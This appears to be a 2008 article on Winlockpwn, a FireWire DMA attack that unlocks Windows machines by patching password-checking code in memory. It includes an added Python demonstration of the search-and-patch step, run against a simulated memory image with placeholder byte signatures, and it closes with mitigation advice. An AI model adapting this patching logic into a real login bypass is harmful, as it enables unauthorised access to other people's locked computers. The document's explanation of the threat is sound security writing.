11 March 2008

Winlockpwn - Bypass Windows Authentication via Firewire

Adam Boileau, a security consultant from New Zealand, has released a tool to unlock a Windows PC in seconds by bypassing the standard Login/Password requirement.

The Python script, called Winlockpwn, exploits the direct memory access (DMA) that the IEEE 1394 / Firewire bus grants to attached devices: it reads the target's physical memory over the bus, locates the code that validates the login password, and patches it in place so that any password is accepted. An attacker can unlock a locked Windows machine, or log in without a password, merely by connecting a Linux-based computer to the victim's Firewire port and running the script.

The hack affects all Windows XP machines, and there are reports of a Vista attack succeeding with a slightly modified version. Unlike USB, where the host controller moves data only into buffers the operating system hands it, the IEEE 1394 / Firewire specification lets an attached device issue reads and writes of the host's physical memory directly, and the host's 1394 controller services those requests without the operating system being involved. That is why a locked screen is no barrier: the attacker's machine reads the running system's memory until it finds the password-validation code and overwrites it. The same property means other operating systems such as BSD, Linux and Mac OS X may also be susceptible, and a laptop with no built-in port is not necessarily safe either if it accepts a hot-plugged CardBus/PCMCIA 1394 card, since the controller driver loads on insertion even while the screen is locked.
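To make the search-and-patch step concrete, here is an added example that is not Winlockpwn's code nor anything from Adam Boileau: it scans a physical-memory image for a byte pattern and overwrites the conditional jump that rejects a bad password, exactly the job a DMA attack does over the bus. Everything below the comments is an assumption: `SimulatedDMA` stands in for a raw1394-style backend with an in-memory bytearray instead of a live IEEE 1394 link, and `SIGNATURE`, `PATCH_OFFSET` and `PATCH` are constructed placeholders, not the real per-build msv1_0.dll patterns the tool carries.

```python
"""Search-and-patch over a physical-memory image, as a FireWire DMA attack
does. Added example: not Winlockpwn's code. The DMA backend is simulated
and the byte patterns are placeholders, not real Windows signatures."""

PAGE_SIZE = 4096  # DMA reads are issued in fixed-size chunks; 4 KiB is assumed

# Hypothetical pattern: a function prologue, a compare and a conditional jump
# that takes the "password rejected" path. NOT the real msv1_0.dll bytes.
SIGNATURE = bytes.fromhex("8bff558bec3ac37412")
PATCH_OFFSET = 7            # where the "74 12" (je) sits inside SIGNATURE
PATCH = b"\x90\x90"         # overwrite the je with two NOPs: never reject


class SimulatedDMA:
    """Stand-in for a raw1394-style backend; physical RAM is a bytearray.
    On real hardware read()/write() would be IEEE 1394 block requests that
    the target's 1394 controller services without asking the OS."""

    def __init__(self, image: bytearray):
        self.mem = image

    def size(self) -> int:
        return len(self.mem)

    def read(self, addr: int, length: int) -> bytes:
        return bytes(self.mem[addr:addr + length])

    def write(self, addr: int, data: bytes) -> None:
        self.mem[addr:addr + len(data)] = data


def find_signature(dma, signature, start=0, end=None, page_size=PAGE_SIZE):
    """Scan [start, end) page by page and return every absolute address at
    which `signature` occurs. The last len(signature)-1 bytes of each page
    are carried into the next search so a match that straddles a page
    boundary is not missed."""
    end = dma.size() if end is None else min(end, dma.size())
    overlap = len(signature) - 1
    hits, tail, addr = [], b"", start
    while addr < end:
        chunk = dma.read(addr, min(page_size, end - addr))
        buf = tail + chunk
        base = addr - len(tail)          # absolute address of buf[0]
        pos = buf.find(signature)
        while pos != -1:
            hits.append(base + pos)
            pos = buf.find(signature, pos + 1)
        tail = buf[-overlap:] if overlap else b""
        addr += len(chunk)
    return hits


def patch_memory(dma, signature, patch, offset=0):
    """Locate exactly one occurrence of `signature` and write `patch` at
    hit + offset. Zero hits means an unknown build or code already patched;
    more than one means the pattern is not specific enough, and writing to
    the wrong page of a live target crashes it, so refuse in both cases.
    Returns (patched address, original bytes) so the change can be undone."""
    hits = find_signature(dma, signature)
    if len(hits) != 1:
        raise RuntimeError(f"expected exactly one hit, found {len(hits)}")
    addr = hits[0] + offset
    original = dma.read(addr, len(patch))
    dma.write(addr, patch)
    if dma.read(addr, len(patch)) != patch:   # read back: DMA writes can silently fail
        raise RuntimeError("write verification failed")
    return addr, original


def build_image(positions=(PAGE_SIZE - 3,), pages=3) -> bytearray:
    """Constructed 'RAM': zero-filled pages with SIGNATURE planted at the
    given offsets. The default plants it across the first page boundary."""
    image = bytearray(pages * PAGE_SIZE)
    for pos in positions:
        image[pos:pos + len(SIGNATURE)] = SIGNATURE
    return image


def run_attack(dma):
    """Patch the validator and report where; returns None if refused."""
    try:
        return patch_memory(dma, SIGNATURE, PATCH, PATCH_OFFSET)
    except RuntimeError:
        return None


if __name__ == "__main__":
    dma = SimulatedDMA(build_image())
    print("hits before:", [hex(a) for a in find_signature(dma, SIGNATURE)])
    print("patched at: ", run_attack(dma))
    print("hits after: ", find_signature(dma, SIGNATURE))
```

The page-overlap in `find_signature` and the exactly-one-hit rule in `patch_memory` are the two details that matter on real hardware: a pattern that lands across a page boundary is otherwise missed, and a pattern loose enough to hit twice is a good way to blue-screen the target instead of unlocking it. Running the script a second time finds nothing, because the patched bytes no longer match the signature, which is how a tool can tell the machine is already unlocked.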

This hack was first demonstrated by Adam Boileau at the Ruxcon security conference in Sydney in 2006, but Microsoft has not taken it seriously enough to develop a fix. In the meantime the practical mitigation is to disable the 1394 controller, or remove its driver, on machines that are left running and unattended, and to treat physical access to a locked machine as equivalent to read and write access to everything in its memory, not only the login check.

